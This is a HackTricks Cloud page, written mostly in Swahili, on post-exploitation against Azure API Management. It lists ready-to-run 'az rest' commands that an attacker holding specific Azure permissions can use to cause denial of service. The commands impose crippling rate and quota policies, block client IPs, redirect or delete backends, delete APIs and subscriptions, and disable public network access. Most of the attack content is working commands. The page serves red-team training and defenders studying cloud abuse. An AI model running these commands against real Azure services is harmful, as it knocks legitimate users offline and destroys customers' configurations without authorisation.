Azure - API Management Post-Exploitation

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

`Microsoft.ApiManagement/service/apis/policies/write` or `Microsoft.ApiManagement/service/policies/write`

Mshambuliaji anaweza kutumia njia nyingi kusababisha denial of service. Ili kuzuia trafiki halali, mshambuliaji anaongeza rate-limiting na quota policies zenye thamani za chini sana, kwa ufanisi kuzuia ufikaji wa kawaida:

az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><rate-limit calls=\"1\" renewal-period=\"3600\" /><quota calls=\"10\" renewal-period=\"86400\" /><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
}
}'

Ili kuzuia anwani maalum za IP za wateja halali, mshambuliaji anaweza kuongeza sera za kuchuja IP zinazokataa maombi kutoka kwa anwani zilizochaguliwa:

az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><ip-filter action=\"forbid\"><address>1.2.3.4</address><address>1.2.3.5</address></ip-filter><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
}
}'

`Microsoft.ApiManagement/service/backends/write` or `Microsoft.ApiManagement/service/backends/delete`

Ili kusababisha requests kushindwa, attacker anaweza modify backend configuration na kubadilisha URL yake kuwa anwani isiyo halali au isiyofikika:

az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
"properties": {
"url": "https://invalid-backend-that-does-not-exist.com",
"protocol": "http"
}
}'

Au futa backends:

az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "If-Match=*"

`Microsoft.ApiManagement/service/apis/delete`

Ili kufanya APIs muhimu zisipatikane, mshambuliaji anaweza kuzifuta moja kwa moja kutoka kwenye API Management service:

az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>?api-version=2024-05-01" \
--headers "If-Match=*"

`Microsoft.ApiManagement/service/write` or `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action`

Ili kuzuia upatikanaji kutoka Internet, attacker anaweza kuzima public network access kwenye API Management service:

az rest --method PATCH \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"publicNetworkAccess": "Disabled"
}
}'

`Microsoft.ApiManagement/service/subscriptions/delete`

Ili kuzuia ufikiaji kwa watumiaji halali, mshambuliaji anaweza kufuta API Management subscriptions:

az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<apim-subscription-id>?api-version=2024-05-01" \
--headers "If-Match=*"

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

HackTricks Cloud

Azure - API Management Post-Exploitation

Microsoft.ApiManagement/service/apis/policies/write or Microsoft.ApiManagement/service/policies/write

Microsoft.ApiManagement/service/backends/write or Microsoft.ApiManagement/service/backends/delete

Microsoft.ApiManagement/service/apis/delete

Microsoft.ApiManagement/service/write or Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action

Microsoft.ApiManagement/service/subscriptions/delete

`Microsoft.ApiManagement/service/apis/policies/write` or `Microsoft.ApiManagement/service/policies/write`

`Microsoft.ApiManagement/service/backends/write` or `Microsoft.ApiManagement/service/backends/delete`

`Microsoft.ApiManagement/service/apis/delete`

`Microsoft.ApiManagement/service/write` or `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action`

`Microsoft.ApiManagement/service/subscriptions/delete`